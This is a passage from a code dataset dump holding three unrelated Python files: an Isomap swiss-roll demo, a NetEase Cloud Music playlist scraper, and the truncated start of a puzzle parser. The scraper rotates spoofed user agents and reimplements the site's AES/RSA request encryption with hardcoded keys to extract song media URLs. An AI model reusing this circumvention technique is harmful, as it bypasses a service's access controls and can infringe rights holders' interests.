roll.\nplt.figure(1)\nplt.ion()\nax = Axes3D(plt.gcf())\nax.scatter(x[0,:], x[1,:], x[2,:], s = 18 * np.ones((1, m)), c = y[0,:])\nplt.show()\nplt.ioff()\n\nraw_input('press any key to continue\\n')\n\n## Step 1: Create the neighborhood graph \n# Find neighbors of each data point within distance epsilon (e).\n# G is the adjacency matrix recording neighbor Euclidean distance \nG1 = np.sum(np.power(x,2),axis = 0).T.reshape(m,1)\nG1 = G1.dot(np.ones((1,m)))\nG2 = np.sum(np.power(x,2),axis = 0).reshape(1,m)\nG2 = np.ones((m, 1)).dot(G2)\nG3 = 2 * x.T.dot(x)\nG = G1 + G2 - G3\nG[G < 0] = 0\nG = np.sqrt(G)\n\ne = 0.2 * np.median(G)\nG[G > e] = 0\n\n# Drop isolated points (effectively infinite distances) for simplicity\nsG = np.sum(G, axis = 0)\nidx = np.where(sG != 0)[0]\n\nG = G[idx,:][:,idx]\nm = G.shape[0]\n\n## Step 2: Using an all-pairs shortest path algorithm, construct the graph\n# distance matrix \nD = csgraph.shortest_path(csc_matrix(G))\nD2 = np.power(D, 2) # squared distances, used to build the inner-product (Gram) matrix\nH = np.eye(m) - np.ones((m,1)).dot(np.ones((1,m)))/m # Construct the centering matrix H\nDt = -0.5 * H.dot(D2) # Apply H to both sides of D2\nDt = Dt.dot(H)\n\n## Step 3: Low dim. 
representation that preserves distance information\nV, S, U = np.linalg.svd(Dt) # full SVD of the centered distance matrix; only the\n # leading singular values/vectors are used below\n\n\n# Use the eigenvector corresponding to the largest eigenvalue as the 1st\n# coordinate and the second largest eigenvalue as the 2nd coordinate\ndim1_new = V[:,0] * np.sqrt(S[0])\ndim2_new = V[:,1] * np.sqrt(S[1])\n\n# Plot scatter of the swiss roll dataset in reduced dimensions after isomap\n# analysis. Use m and idx so sizes and colors match the points that survived\n# the neighborhood filtering.\nplt.figure(2)\nplt.ion()\nplt.scatter(-dim1_new, -dim2_new, s = 18 * np.ones((1, m)), c = y[1, idx])\nplt.show()\nplt.ioff()\nplt.show()","sub_path":"Isomap/swiss_roll/test_isomap2.py","file_name":"test_isomap2.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"215996742","text":"# -*- coding: utf-8 -*-\n__author__ = \"dzt\"\n__date__ = \"2018/12/10 11:49\"\n\n\nimport requests\nimport os, json, base64\nfrom scrapy.selector import Selector\nfrom binascii import hexlify\nfrom Crypto.Cipher import AES\nimport random\nimport xlwt\n\nsep = '\\n'\nsep1 = '*'*50 + '\\n'\nsep2 = '\\n' + '*'*50 + '\\n\\n'\n\n# url = 'https://www.ximalaya.com/youshengshu/4202564/'\nAgent = [\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\n \"Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 \",\n \"Mozilla/5.0 \"\n \"(Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14\",\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',\n \"Mozilla/5.0 \"\n \"(Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\",\n 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',\n 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; '\n 'MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); '\n '.NET CLR 2.0.50727; InfoPath.1)',\n 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; '\n 'FunWebProducts)',\n 'Mozilla/5.0 (X11; U; UNICOS lcLinux; en-US) Gecko/20140730 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',\n 'Mozilla/5.0 (X11; U; Linux; pt-PT) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.4'\n ]\n\n\nclass Encrypyed():\n '''Take a song ID and generate the encrypted 'params' and 'encSecKey' payload'''\n def __init__(self):\n self.pub_key = '010001'\n self.modulus = '00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7'\n self.nonce = '0CoJUm6Qyw8W8jud'\n\n def create_secret_key(self, size):\n return hexlify(os.urandom(size))[:16].decode('utf-8')\n\n def aes_encrypt(self, text, key):\n iv = '0102030405060708'\n pad = 16 - len(text) % 16\n text = text + pad * chr(pad)\n encryptor = AES.new(key, AES.MODE_CBC, iv)\n result = encryptor.encrypt(text)\n result_str = base64.b64encode(result).decode('utf-8')\n return result_str\n\n def 
rsa_encrpt(self, text, pubKey, modulus):\n text = text[::-1]\n rs = pow(int(hexlify(text.encode('utf-8')), 16), int(pubKey, 16), int(modulus, 16))\n return format(rs, 'x').zfill(256)\n\n def work(self, text):\n text = json.dumps(text)\n i = self.create_secret_key(16)\n encText = self.aes_encrypt(text, self.nonce)\n encText = self.aes_encrypt(encText, i)\n encSecKey = self.rsa_encrpt(i, self.pub_key, self.modulus)\n data = {'params': encText, 'encSecKey': encSecKey}\n # print(data)\n return data\n\n\nclass wangyiyun():\n def __init__(self):\n self.headers = {\n 'User-Agent': random.choice(Agent),\n 'Referer': 'http://music.163.com/'}\n self.main_url = 'http://music.163.com/'\n self.session = requests.Session()\n self.session.headers = self.headers\n self.ep = Encrypyed()\n\n def get_songurls(self, playlist):\n '''Open the selected playlist page and collect each song's ID, in the form \"song?id=64006\"'''\n url = self.main_url+'playlist?id=%d' % playlist\n resp = self.session.get(url) # fetch the page directly with the session\n sel = Selector(text=resp.text) # parse with scrapy's Selector\n songurls = sel.xpath('//ul[@class=\"f-hide\"]/li/a/@href').extract()\n return songurls # list of all song page urls\n ##['/song?id=64006', '/song?id=63959', '/song?id=25642714', '/song?id=63914', '/song?id=4878122', '/song?id=63650']\n\n def get_songinfo(self, songurl):\n '''Open the info page for a song url and extract the song's details.\n return: '64006', 陈小春-失恋王'''\n url = self.main_url+songurl\n resp = self.session.get(url)\n sel = Selector(text=resp.text)\n song_id = url.split('=')[1]\n songname = sel.xpath(\"//em[@class='f-ff2']/text()\").extract_first()\n singer = '&'.join(sel.xpath(\"//p[@class='des s-fc4']/span/a/text()\").extract())\n # songname = singer+'-'+song_name\n return str(song_id), songname, singer\n\n def get_url(self, ids, br=128000):\n '''Pass the song ID through self.ep.work to get the encrypted data {'params', 'encSecKey'},\n then POST it to obtain the url where the song is hosted'''\n text = {'ids': [ids], 'br': br, 'csrf_token': ''}\n data = self.ep.work(text)\n url = 'http://music.163.com/weapi/song/enhance/player/url?csrf_token='\n req = self.session.post(url, data=data)\n song_url = req.json()['data'][0]['url']\n return song_url\n\n def url_song(self, songurl, dir_path):\n '''Resolve the mp3 address for a song page url'''\n song_id, songname, singer = self.get_songinfo(songurl) # get the ID, song name and singer from the song url\n song_url = self.get_url(song_id) # get the actual media url from the ID\n print(songname)\n print(song_url)\n return songname, song_url, singer\n\n\n def work(self, playlist):\n songurls = self.get_songurls(playlist) # given a playlist id, get the urls of all its songs\n dir_path = r''\n f = xlwt.Workbook()\n sheet1 = f.add_sheet(u'Sheet1', cell_overwrite_ok=True)\n for a, songurl in enumerate(songurls): # enumerate avoids index() misfiring on duplicate urls\n songname, song_url, singer = self.url_song(songurl, dir_path)\n if song_url is None:\n continue\n sheet1.write(a, 0, songname) # title\n sheet1.write(a, 1, 12) # category\n sheet1.write(a, 2, song_url) # resource url\n sheet1.write(a, 3, 1) # starting age\n sheet1.write(a, 4, 99) # ending age\n sheet1.write(a, 5, 1) # language scope\n sheet1.write(a, 6, '') # description\n sheet1.write(a, 7, singer) # performer/host\n sheet1.write(a, 8, '') # author/lyricist\n sheet1.write(a, 9, '') # main character\n sheet1.write(a, 10, '') # composer\n sheet1.write(a, 11, '') # main plot\n sheet1.write(a, 12, '') # cover url\n new_imei_file = '%s.xls' % playlist\n f.save(new_imei_file)\n\nif __name__ == '__main__':\n d = wangyiyun()\n d.work(2204388891)\n\n","sub_path":"wangyiyun_mp3.py","file_name":"wangyiyun_mp3.py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"430598093","text":"#!/usr/bin/python3\n\nimport re\n\n\nPROPERTIES = ['children', 
'cats', 'samoyeds', 'pomeranians', 'akitas', 'vizslas', 'goldfish', 'trees', 'cars', 'perfumes']\n\nFILTER = {\n \"children\": 3,\n \"cats\": 7,\n \"samoyeds\": 2,\n \"pomeranians\": 3,\n \"akitas\": 0,\n \"vizslas\": 0,\n \"goldfish\": 5,\n \"trees\": 3,\n \"cars\": 2,\n \"perfumes\": 1\n}\n\naunts = []\n\nwith open('input') as f:\n for line in f:\n line = line.strip()\n m = re.match('Sue (?P<number>\\d+):', line)\n number = m.group('number')\n \n sue = { 'number': number }\n for m in re.finditer('(?P